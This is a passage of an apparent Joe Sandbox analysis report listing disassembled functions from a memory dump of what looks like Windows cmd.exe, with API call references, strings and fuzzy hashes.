                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                            • String ID: %9d
                                                                            • API String ID: 4212706909-2241623522
                                                                            • Opcode ID: 0bb9576a9052d3fa7c94a74562a765f705845f40f122492f0890c604d799018b
                                                                            • Instruction ID: fa730be59c32fdaef0afad5958d14387b04d6a031d8aa087a11f205198b0ba37
                                                                            • Opcode Fuzzy Hash: 0bb9576a9052d3fa7c94a74562a765f705845f40f122492f0890c604d799018b
                                                                            • Instruction Fuzzy Hash: 844190B1A04311FFD710DF699C45A6EBBF4EB85724F60419AEA14D72D0DFB09A40CBA1
                                                                            Function 00B07A34 Relevance: 9.3, APIs: 6, Instructions: 338COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B07A9C
                                                                            • memset.MSVCRT ref: 00B07AC7
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00B07BCA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00B07BDC
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 00B1AE5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Heap$AllocProcesslongjmp
                                                                            • String ID:
                                                                            • API String ID: 2656838167-0
                                                                            • Opcode ID: 968e97de95a74fc087b7b77f7ce1c16fe2997d063019dd4b908a89f82f060785
                                                                            • Instruction ID: 99114395878fddf75776b597920e06e095f07d79c37d481bd436ff23340b27f3
                                                                            • Opcode Fuzzy Hash: 968e97de95a74fc087b7b77f7ce1c16fe2997d063019dd4b908a89f82f060785
                                                                            • Instruction Fuzzy Hash: 8CD1BE71E052159BDB28DF24C8957AAFBF1EF04300F5441EDD90AA7681EB70BE81CB95
                                                                            Function 00B06E57 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 361e6bc0d99d3126fba08cc502d74e43a24948a7864286b5b0bd5d287682be96
                                                                            • Instruction ID: 22a480fd1152763f288bcb4616c2b155c540777518e80eb60624a097cf0c3b64
                                                                            • Opcode Fuzzy Hash: 361e6bc0d99d3126fba08cc502d74e43a24948a7864286b5b0bd5d287682be96
                                                                            • Instruction Fuzzy Hash: 26C1C6356043018BD724EF24C851A6ABBE1EF95314F5489ADF886873D1EF31ED85CB92
                                                                            Function 00B10740 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • wcstol.MSVCRT ref: 00B108D9
                                                                            • wcstol.MSVCRT ref: 00B108F3
                                                                            • wcstol.MSVCRT ref: 00B1090B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcstol$Heap$AllocProcess
                                                                            • String ID:
                                                                            • API String ID: 2343214347-0
                                                                            • Opcode ID: b47fec54e67c08f1d25242b93bcd02e6a2bc19f6ebb98e958bf81c8eedb7663d
                                                                            • Instruction ID: 8fb58ed466a5277aa43cd9da03b4c8baee86bf164e520c9814553fa93853db95
                                                                            • Opcode Fuzzy Hash: b47fec54e67c08f1d25242b93bcd02e6a2bc19f6ebb98e958bf81c8eedb7663d
                                                                            • Instruction Fuzzy Hash: 25A19270B102159BDB24EFA9C8959BEBBF5EF44304B9480ADE901DB395DB709C81CB90
                                                                            Function 00B06B20 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • _pipe.MSVCRT ref: 00B06B4F
                                                                            • _get_osfhandle.MSVCRT ref: 00B06BF7
                                                                            • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00B06C05
                                                                              • Part of subcall function 00B0E950: memset.MSVCRT ref: 00B0E9A0
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0E9FC
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0EA14
                                                                              • Part of subcall function 00B0E950: _wcsicmp.MSVCRT ref: 00B0EA80
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B06D8F
                                                                            • longjmp.MSVCRT(00B40A30,00000001), ref: 00B1A6D8
                                                                              • Part of subcall function 00B0A1A8: _dup.MSVCRT ref: 00B0A1AF
                                                                              • Part of subcall function 00B0A1D6: _dup2.MSVCRT ref: 00B0A1EA
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                            • String ID:
                                                                            • API String ID: 1441200171-0
                                                                            • Opcode ID: a575400f4bbf510efcd11038e272825cf04f8f5a7dde4d68970f82794144eea6
                                                                            • Instruction ID: 8da2287b8808c66a37f5041a8486afe595f17178b3b84cb605ff94c6b3730b3c
                                                                            • Opcode Fuzzy Hash: a575400f4bbf510efcd11038e272825cf04f8f5a7dde4d68970f82794144eea6
                                                                            • Instruction Fuzzy Hash: DE9180716003009FDB24EF28D896A6A7BE1EF89720F2489ADE45AD72D1DF30EC51CB51
                                                                            Function 00B16B40 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B16C76,00B01000), ref: 00B16B47
                                                                            • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00B16C76,?,00B16C76,00B01000), ref: 00B16B50
                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00B16C76,00B01000), ref: 00B16B5B
                                                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00B16C76,00B01000), ref: 00B16B62
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 3231755760-0
                                                                            • Opcode ID: 9fd45c23b5468eb92055c4a712667279ff5fcc295688831805849f573f5da788
                                                                            • Instruction ID: 49f6d52f3becc19b86e125c78af6cde2be75f441a2fd38308ea5e53620c954f7
                                                                            • Opcode Fuzzy Hash: 9fd45c23b5468eb92055c4a712667279ff5fcc295688831805849f573f5da788
                                                                            • Instruction Fuzzy Hash: 3BD0C97A084104ABCE002FE1EC0CA497F28FB46252F004000F30DC3121CE7646059B67
                                                                            Function 00B22E37 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00B22FDD), ref: 00B22E5D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 1347740429-0
                                                                            • Opcode ID: 91637e861bc1aae546be1193759ae3eb816a7a8496fbae9f73a26aa10c287182
                                                                            • Instruction ID: db60553b4c875cf9e7f397c0332686902dfe314bc2d1e56b4a930ecb33713291
                                                                            • Opcode Fuzzy Hash: 91637e861bc1aae546be1193759ae3eb816a7a8496fbae9f73a26aa10c287182
                                                                            • Instruction Fuzzy Hash: F4E0C234691231BBE7213B69BE883BE36CCAF1AB00B0604E5F419CB355CF449D04A7A1
                                                                            Function 00B09458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00B2C9D0,00000108,00B12107,?,00000000,00000000,00000000), ref: 00B094AA
                                                                            • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00B094D9
                                                                            • memset.MSVCRT ref: 00B094F1
                                                                            • memset.MSVCRT ref: 00B0954A
                                                                            • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00B0955D
                                                                              • Part of subcall function 00B11D90: _wcsnicmp.MSVCRT ref: 00B11E14
                                                                            • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00B095B8
                                                                            • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00B09602
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00B09624
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00B1BDF1
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00B1BE0D
                                                                            • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00B1BE26
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                            • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                            • API String ID: 1449572041-3461277227
                                                                            • Opcode ID: 4fdfe71af8c9654d4e4ebc2dccfb4199cd70b76d2bbfa9ac728d8def66b7ce8a
                                                                            • Instruction ID: 1af30111959aaa49fbef66fcf075eb8a62c1b4252f9ababa321daa08ba3b4e1f
                                                                            • Opcode Fuzzy Hash: 4fdfe71af8c9654d4e4ebc2dccfb4199cd70b76d2bbfa9ac728d8def66b7ce8a
                                                                            • Instruction Fuzzy Hash: DCC18075A003189FDB249F65DC45BEA7BF8EB45300F5044EAE60AD7291EB708E84CF61
                                                                            Function 00B04710 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 435fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B04781
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _get_osfhandle.MSVCRT ref: 00B047E4
                                                                            • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00B047EC
                                                                            • _get_osfhandle.MSVCRT ref: 00B047FD
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B04805
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            • _get_osfhandle.MSVCRT ref: 00B04832
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00B0483A
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B04871
                                                                            • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00B18120
                                                                            • memmove.MSVCRT(?,?,?), ref: 00B18191
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00B18328
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B1832F
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                            • String ID: DPATH
                                                                            • API String ID: 2545859659-2010427443
                                                                            • Opcode ID: 42314175a1396598c103a7dc9673bb543c2a3d18a597d6d0fdab3972258aa365
                                                                            • Instruction ID: f1bbc6c6cfdca8560819246db12ff1a6100a711288019e1423c6a6b8b0b261cf
                                                                            • Opcode Fuzzy Hash: 42314175a1396598c103a7dc9673bb543c2a3d18a597d6d0fdab3972258aa365
                                                                            • Instruction Fuzzy Hash: 5FF1BE715083419FD724CF24C888BABBBE8FB89710F544A6DF99993290DF70D985CB92
                                                                            Function 00B0E0B0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 308COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$iswspace
                                                                            • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                            • API String ID: 759518647-875390083
                                                                            • Opcode ID: 49f75584f3435686d4eeb1a2dc1253f5795ea894c80917a88e3c07a5a243da51
                                                                            • Instruction ID: 6b61cdb585969e58c6e68047c3f76878f13bb002ad94b35a26716fd31026526a
                                                                            • Opcode Fuzzy Hash: 49f75584f3435686d4eeb1a2dc1253f5795ea894c80917a88e3c07a5a243da51
                                                                            • Instruction Fuzzy Hash: ECA136342443028AE7386B24AC5ABBB3BE4EF41710F5448EEE602871E1DFB4C9D0C75A
                                                                            Function 00B0CF10 Relevance: 33.7, APIs: 15, Strings: 4, Instructions: 446COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                            • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                            • API String ID: 684130364-3872429996
                                                                            • Opcode ID: 4ac812b3262fe8e79471aeb863c3c1063715028731e0c3dba6c4fe104fd9562f
                                                                            • Instruction ID: de6fa3438ef6adb1d7063dfd16ac800b35e2a383e025caa5530b503bf3460a2a
                                                                            • Opcode Fuzzy Hash: 4ac812b3262fe8e79471aeb863c3c1063715028731e0c3dba6c4fe104fd9562f
                                                                            • Instruction Fuzzy Hash: 56E1F375A002119ACB208FE8D88537E7FE1EF61340F2481E6EC4AD72D1EB35CE45975A
                                                                            Function 00B0EC2E Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B2E590,00002000,?,00B48BF0,00000000,?,?,00B08F0D), ref: 00B0EC51
                                                                            • _wcsicmp.MSVCRT ref: 00B0EC77
                                                                            • _wcsicmp.MSVCRT ref: 00B0EC8D
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECA3
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECB9
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECCF
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECE5
                                                                            • _wcsicmp.MSVCRT ref: 00B0ECF7
                                                                            • _wcsicmp.MSVCRT ref: 00B0ED0D
                                                                              • Part of subcall function 00B09310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00B2E590,?,00002000), ref: 00B09342
                                                                              • Part of subcall function 00B09310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B09356
                                                                              • Part of subcall function 00B09310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00B0936A
                                                                              • Part of subcall function 00B09310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B0937E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                            • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                            • API String ID: 2447294730-2301591722
                                                                            • Opcode ID: b88d33267aee3487777defd33a0b62b26f3ca1700118d571c41e31aa3a95929d
                                                                            • Instruction ID: 8701577a323d1b286f1b6cfa8e3fd88e8d94555604ae292aa9b4ddc2a96f960d
                                                                            • Opcode Fuzzy Hash: b88d33267aee3487777defd33a0b62b26f3ca1700118d571c41e31aa3a95929d
                                                                            • Instruction Fuzzy Hash: 0A310936248312BFF7181721AC5EA6F2FDDFB46320B2848A9F522D20D1EF55D901826A
                                                                            Function 00B29C2E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 250COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsupr.MSVCRT ref: 00B29CC8
                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00B29D22
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00B29D2A
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D3A
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D50
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B29D58
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D68
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B29D7C
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B29DDB
                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B29DE2
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00B29DF2
                                                                            • towupper.MSVCRT ref: 00B29E13
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            • wcschr.MSVCRT ref: 00B29E6A
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B29E9B
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B29EA9
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                            • String ID: <noalias>$CMD.EXE
                                                                            • API String ID: 2015057810-1690691951
                                                                            • Opcode ID: 6e6019b845ee32e49b4b797e5b7754e60a385c0f2496fde0869c02c6f16fe61b
